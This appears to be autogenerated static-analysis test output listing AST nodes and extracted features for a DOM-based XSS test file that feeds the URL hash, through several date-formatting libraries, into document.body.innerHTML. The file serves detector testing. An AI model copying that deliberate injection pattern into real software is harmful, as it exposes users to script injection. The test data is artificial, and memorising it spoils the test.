autogenerated/Xss/DomBasedXss/dates.js:1:8:1:14 | dateFns | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dates.js:1:8:1:14 | dateFns | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dates.js:1:8:1:14 | dateFns | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dates.js:1:8:1:14 | dateFns | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:1:8:1:14 | dateFns | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:1:8:1:14 | dateFns | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:1:21:1:30 | 'date-fns' | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:1:21:1:30 | 'date-fns' | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dates.js:1:21:1:30 | 'date-fns' | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:2:1:2:36 | import ... ns/fp'; | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:2:1:2:36 | import ... ns/fp'; | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dates.js:2:1:2:36 | import ... ns/fp'; | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:2:8:2:16 | dateFnsFp | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:2:8:2:16 | dateFnsFp | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:2:8:2:16 | dateFnsFp | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:2:8:2:16 | dateFnsFp | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dates.js:2:8:2:16 | dateFnsFp | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dates.js:2:8:2:16 | dateFnsFp | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dates.js:2:8:2:16 | dateFnsFp | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dates.js:2:8:2:16 | dateFnsFp | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:2:8:2:16 | dateFnsFp | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:2:8:2:16 | dateFnsFp | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:2:23:2:35 | 'date-fns/fp' | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:2:23:2:35 | 'date-fns/fp' | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dates.js:2:23:2:35 | 'date-fns/fp' | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:3:1:3:38 | import ... s/esm'; | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:3:1:3:38 | import ... s/esm'; | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dates.js:3:1:3:38 | import ... s/esm'; | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:3:8:3:17 | dateFnsEsm | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:3:8:3:17 | dateFnsEsm | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:3:8:3:17 | dateFnsEsm | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:3:8:3:17 | dateFnsEsm | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dates.js:3:8:3:17 | dateFnsEsm | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dates.js:3:8:3:17 | dateFnsEsm | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dates.js:3:8:3:17 | dateFnsEsm | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dates.js:3:8:3:17 | dateFnsEsm | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:3:8:3:17 | dateFnsEsm | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:3:8:3:17 | dateFnsEsm | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:3:24:3:37 | 'date-fns/esm' | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:3:24:3:37 | 'date-fns/esm' | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dates.js:3:24:3:37 | 'date-fns/esm' | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:4:1:4:28 | import ... oment'; | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:4:1:4:28 | import ... oment'; | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dates.js:4:1:4:28 | import ... oment'; | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:4:8:4:13 | moment | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:4:8:4:13 | moment | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:4:8:4:13 | moment | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:4:8:4:13 | moment | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dates.js:4:8:4:13 | moment | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dates.js:4:8:4:13 | moment | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dates.js:4:8:4:13 | moment | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dates.js:4:8:4:13 | moment | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:4:8:4:13 | moment | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:4:8:4:13 | moment | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:4:20:4:27 | 'moment' | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:4:20:4:27 | 'moment' | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dates.js:4:20:4:27 | 'moment' | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:5:1:5:36 | import ... ormat'; | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:5:1:5:36 | import ... ormat'; | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dates.js:5:1:5:36 | import ... ormat'; | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:5:8:5:17 | dateformat | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:5:8:5:17 | dateformat | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:5:8:5:17 | dateformat | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:5:8:5:17 | dateformat | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dates.js:5:8:5:17 | dateformat | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dates.js:5:8:5:17 | dateformat | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dates.js:5:8:5:17 | dateformat | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dates.js:5:8:5:17 | dateformat | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:5:8:5:17 | dateformat | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:5:8:5:17 | dateformat | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:5:24:5:35 | 'dateformat' | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:5:24:5:35 | 'dateformat' | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dates.js:5:24:5:35 | 'dateformat' | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:7:1:7:0 | dateFns | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:7:1:7:0 | dateFns | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dates.js:7:1:7:0 | dateFns | enclosingFunctionBody | time Date taint decodeURIComponent window location hash substring 1 document body innerHTML Time is dateFns format time taint document body innerHTML Time is dateFnsEsm format time taint document body innerHTML Time is dateFnsFp format taint time document body innerHTML Time is dateFns format taint time document body innerHTML Time is dateFnsFp format time taint document body innerHTML Time is moment time format taint document body innerHTML Time is moment taint format document body innerHTML Time is dateformat time taint dayjs dayjs document body innerHTML Time is dayjs time format taint | +| autogenerated/Xss/DomBasedXss/dates.js:7:1:7:0 | dateFns | enclosingFunctionName | main | +| autogenerated/Xss/DomBasedXss/dates.js:7:1:7:0 | dateFns | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:7:1:7:0 | dateFnsEsm | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:7:1:7:0 | dateFnsEsm | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dates.js:7:1:7:0 | dateFnsEsm | enclosingFunctionBody | time Date taint decodeURIComponent window location hash substring 1 document body innerHTML Time is dateFns format time taint document body innerHTML Time is dateFnsEsm format time taint document body innerHTML Time is dateFnsFp format taint time document body innerHTML Time is dateFns format taint time document body innerHTML Time is dateFnsFp format time taint document body innerHTML Time is moment time format taint document body innerHTML Time is moment taint format document body innerHTML Time is dateformat time taint dayjs dayjs document body innerHTML Time is dayjs time format taint | +| autogenerated/Xss/DomBasedXss/dates.js:7:1:7:0 | dateFnsEsm | enclosingFunctionName | main | +| autogenerated/Xss/DomBasedXss/dates.js:7:1:7:0 | dateFnsEsm | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:7:1:7:0 | dateFnsFp | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:7:1:7:0 | dateFnsFp | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dates.js:7:1:7:0 | dateFnsFp | enclosingFunctionBody | time Date taint decodeURIComponent window location hash substring 1 document body innerHTML Time is dateFns format time taint document body innerHTML Time is dateFnsEsm format time taint document body innerHTML Time is dateFnsFp format taint time document body innerHTML Time is dateFns format taint time document body innerHTML Time is dateFnsFp format time taint document body innerHTML Time is moment time format taint document body innerHTML Time is moment taint format document body innerHTML Time is dateformat time taint dayjs dayjs document body innerHTML Time is dayjs time format taint | +| autogenerated/Xss/DomBasedXss/dates.js:7:1:7:0 | dateFnsFp | enclosingFunctionName | main | +| autogenerated/Xss/DomBasedXss/dates.js:7:1:7:0 | dateFnsFp | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:7:1:7:0 | dateformat | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:7:1:7:0 | dateformat | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dates.js:7:1:7:0 | dateformat | enclosingFunctionBody | time Date taint decodeURIComponent window location hash substring 1 document body innerHTML Time is dateFns format time taint document body innerHTML Time is dateFnsEsm format time taint document body innerHTML Time is dateFnsFp format taint time document body innerHTML Time is dateFns format taint time document body innerHTML Time is dateFnsFp format time taint document body innerHTML Time is moment time format taint document body innerHTML Time is moment taint format document body innerHTML Time is dateformat time taint dayjs dayjs document body innerHTML Time is dayjs time format taint | +| autogenerated/Xss/DomBasedXss/dates.js:7:1:7:0 | dateformat | enclosingFunctionName | main | +| autogenerated/Xss/DomBasedXss/dates.js:7:1:7:0 | dateformat | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:7:1:7:0 | moment | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:7:1:7:0 | moment | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dates.js:7:1:7:0 | moment | enclosingFunctionBody | time Date taint decodeURIComponent window location hash substring 1 document body innerHTML Time is dateFns format time taint document body innerHTML Time is dateFnsEsm format time taint document body innerHTML Time is dateFnsFp format taint time document body innerHTML Time is dateFns format taint time document body innerHTML Time is dateFnsFp format time taint document body innerHTML Time is moment time format taint document body innerHTML Time is moment taint format document body innerHTML Time is dateformat time taint dayjs dayjs document body innerHTML Time is dayjs time format taint | +| autogenerated/Xss/DomBasedXss/dates.js:7:1:7:0 | moment | enclosingFunctionName | main | +| autogenerated/Xss/DomBasedXss/dates.js:7:1:7:0 | moment | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:7:1:7:0 | this | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:7:1:7:0 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dates.js:7:1:7:0 | this | enclosingFunctionBody | time Date taint decodeURIComponent window location hash substring 1 document body innerHTML Time is dateFns format time taint document body innerHTML Time is dateFnsEsm format time taint document body innerHTML Time is dateFnsFp format taint time document body innerHTML Time is dateFns format taint time document body innerHTML Time is dateFnsFp format time taint document body innerHTML Time is moment time format taint document body innerHTML Time is moment taint format document body innerHTML Time is dateformat time taint dayjs dayjs document body innerHTML Time is dayjs time format taint | +| autogenerated/Xss/DomBasedXss/dates.js:7:1:7:0 | this | enclosingFunctionName | main | +| autogenerated/Xss/DomBasedXss/dates.js:7:1:7:0 | this | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:7:1:22:1 | 'arguments' object of function main | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:7:1:22:1 | 'arguments' object of function main | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dates.js:7:1:22:1 | 'arguments' object of function main | enclosingFunctionBody | time Date taint decodeURIComponent window location hash substring 1 document body innerHTML Time is dateFns format time taint document body innerHTML Time is dateFnsEsm format time taint document body innerHTML Time is dateFnsFp format taint time document body innerHTML Time is dateFns format taint time document body innerHTML Time is dateFnsFp format time taint document body innerHTML Time is moment time format taint document body innerHTML Time is moment taint format document body innerHTML Time is dateformat time taint dayjs dayjs document body innerHTML Time is dayjs time format taint | +| autogenerated/Xss/DomBasedXss/dates.js:7:1:22:1 | 'arguments' object of function main | enclosingFunctionName | main | +| autogenerated/Xss/DomBasedXss/dates.js:7:1:22:1 | 'arguments' object of function main | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:7:1:22:1 | exceptional return of function main | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:7:1:22:1 | exceptional return of function main | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dates.js:7:1:22:1 | exceptional return of function main | enclosingFunctionBody | time Date taint decodeURIComponent window location hash substring 1 document body innerHTML Time is dateFns format time taint document body innerHTML Time is dateFnsEsm format time taint document body innerHTML Time is dateFnsFp format taint time document body innerHTML Time is dateFns format taint time document body innerHTML Time is dateFnsFp format time taint document body innerHTML Time is moment time format taint document body innerHTML Time is moment taint format document body innerHTML Time is dateformat time taint dayjs dayjs document body innerHTML Time is dayjs time format taint | +| autogenerated/Xss/DomBasedXss/dates.js:7:1:22:1 | exceptional return of function main | enclosingFunctionName | main | +| autogenerated/Xss/DomBasedXss/dates.js:7:1:22:1 | exceptional return of function main | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:7:1:22:1 | functio ... OT OK\\n} | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:7:1:22:1 | functio ... OT OK\\n} | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dates.js:7:1:22:1 | functio ... OT OK\\n} | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:7:1:22:1 | return of function main | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:7:1:22:1 | return of function main | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dates.js:7:1:22:1 | return of function main | enclosingFunctionBody | time Date taint decodeURIComponent window location hash substring 1 document body innerHTML Time is dateFns format time taint document body innerHTML Time is dateFnsEsm format time taint document body innerHTML Time is dateFnsFp format taint time document body innerHTML Time is dateFns format taint time document body innerHTML Time is dateFnsFp format time taint document body innerHTML Time is moment time format taint document body innerHTML Time is moment taint format document body innerHTML Time is dateformat time taint dayjs dayjs document body innerHTML Time is dayjs time format taint | +| autogenerated/Xss/DomBasedXss/dates.js:7:1:22:1 | return of function main | enclosingFunctionName | main | +| autogenerated/Xss/DomBasedXss/dates.js:7:1:22:1 | return of function main | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:7:10:7:13 | main | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:7:10:7:13 | main | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:7:10:7:13 | main | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:8:9:8:12 | time | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:8:9:8:12 | time | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:8:9:8:12 | time | enclosingFunctionBody | time Date taint decodeURIComponent window location hash substring 1 document body innerHTML Time is dateFns format time taint document body innerHTML Time is dateFnsEsm format time taint document body innerHTML Time is dateFnsFp format taint time document body innerHTML Time is dateFns format taint time document body innerHTML Time is dateFnsFp format time taint document body innerHTML Time is moment time format taint document body innerHTML Time is moment taint format document body innerHTML Time is dateformat time taint dayjs dayjs document body innerHTML Time is dayjs time format taint | +| autogenerated/Xss/DomBasedXss/dates.js:8:9:8:12 | time | enclosingFunctionName | main | +| autogenerated/Xss/DomBasedXss/dates.js:8:9:8:12 | time | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:8:9:8:25 | time | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:8:9:8:25 | time | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dates.js:8:9:8:25 | time | enclosingFunctionBody | time Date taint decodeURIComponent window location hash substring 1 document body innerHTML Time is dateFns format time taint document body innerHTML Time is dateFnsEsm format time taint document body innerHTML Time is dateFnsFp format taint time document body innerHTML Time is dateFns format taint time document body innerHTML Time is dateFnsFp format time taint document body innerHTML Time is moment time format taint document body innerHTML Time is moment taint format document body innerHTML Time is dateformat time taint dayjs dayjs document body innerHTML Time is dayjs time format taint | +| autogenerated/Xss/DomBasedXss/dates.js:8:9:8:25 | time | enclosingFunctionName | main | +| autogenerated/Xss/DomBasedXss/dates.js:8:9:8:25 | time | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:8:9:8:25 | time = new Date() | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:8:9:8:25 | time = new Date() | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:8:9:8:25 | time = new Date() | enclosingFunctionBody | time Date taint decodeURIComponent window location hash substring 1 document body innerHTML Time is dateFns format time taint document body innerHTML Time is dateFnsEsm format time taint document body innerHTML Time is dateFnsFp format taint time document body innerHTML Time is dateFns format taint time document body innerHTML Time is dateFnsFp format time taint document body innerHTML Time is moment time format taint document body innerHTML Time is moment taint format document body innerHTML Time is dateformat time taint dayjs dayjs document body innerHTML Time is dayjs time format taint | +| autogenerated/Xss/DomBasedXss/dates.js:8:9:8:25 | time = new Date() | enclosingFunctionName | main | +| autogenerated/Xss/DomBasedXss/dates.js:8:9:8:25 | time = new Date() | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:8:16:8:25 | exceptional return of new Date() | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:8:16:8:25 | exceptional return of new Date() | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dates.js:8:16:8:25 | exceptional return of new Date() | enclosingFunctionBody | time Date taint decodeURIComponent window location hash substring 1 document body innerHTML Time is dateFns format time taint document body innerHTML Time is dateFnsEsm format time taint document body innerHTML Time is dateFnsFp format taint time document body innerHTML Time is dateFns format taint time document body innerHTML Time is dateFnsFp format time taint document body innerHTML Time is moment time format taint document body innerHTML Time is moment taint format document body innerHTML Time is dateformat time taint dayjs dayjs document body innerHTML Time is dayjs time format taint | +| autogenerated/Xss/DomBasedXss/dates.js:8:16:8:25 | exceptional return of new Date() | enclosingFunctionName | main | +| autogenerated/Xss/DomBasedXss/dates.js:8:16:8:25 | exceptional return of new Date() | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:8:16:8:25 | new Date() | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:8:16:8:25 | new Date() | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:8:16:8:25 | new Date() | enclosingFunctionBody | time Date taint decodeURIComponent window location hash substring 1 document body innerHTML Time is dateFns format time taint document body innerHTML Time is dateFnsEsm format time taint document body innerHTML Time is dateFnsFp format taint time document body innerHTML Time is dateFns format taint time document body innerHTML Time is dateFnsFp format time taint document body innerHTML Time is moment time format taint document body innerHTML Time is moment taint format document body innerHTML Time is dateformat time taint dayjs dayjs document body innerHTML Time is dayjs time format taint | +| autogenerated/Xss/DomBasedXss/dates.js:8:16:8:25 | new Date() | enclosingFunctionName | main | +| autogenerated/Xss/DomBasedXss/dates.js:8:16:8:25 | new Date() | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:8:20:8:23 | Date | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:8:20:8:23 | Date | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:8:20:8:23 | Date | enclosingFunctionBody | time Date taint decodeURIComponent window location hash substring 1 document body innerHTML Time is dateFns format time taint document body innerHTML Time is dateFnsEsm format time taint document body innerHTML Time is dateFnsFp format taint time document body innerHTML Time is dateFns format taint time document body innerHTML Time is dateFnsFp format time taint document body innerHTML Time is moment time format taint document body innerHTML Time is moment taint format document body innerHTML Time is dateformat time taint dayjs dayjs document body innerHTML Time is dayjs time format taint | +| autogenerated/Xss/DomBasedXss/dates.js:8:20:8:23 | Date | enclosingFunctionName | main | +| autogenerated/Xss/DomBasedXss/dates.js:8:20:8:23 | Date | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:9:9:9:13 | taint | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:9:9:9:13 | taint | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:9:9:9:13 | taint | enclosingFunctionBody | time Date taint decodeURIComponent window location hash substring 1 document body innerHTML Time is dateFns format time taint document body innerHTML Time is dateFnsEsm format time taint document body innerHTML Time is dateFnsFp format taint time document body innerHTML Time is dateFns format taint time document body innerHTML Time is dateFnsFp format time taint document body innerHTML Time is moment time format taint document body innerHTML Time is moment taint format document body innerHTML Time is dateformat time taint dayjs dayjs document body innerHTML Time is dayjs time format taint | +| autogenerated/Xss/DomBasedXss/dates.js:9:9:9:13 | taint | enclosingFunctionName | main | +| autogenerated/Xss/DomBasedXss/dates.js:9:9:9:13 | taint | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| 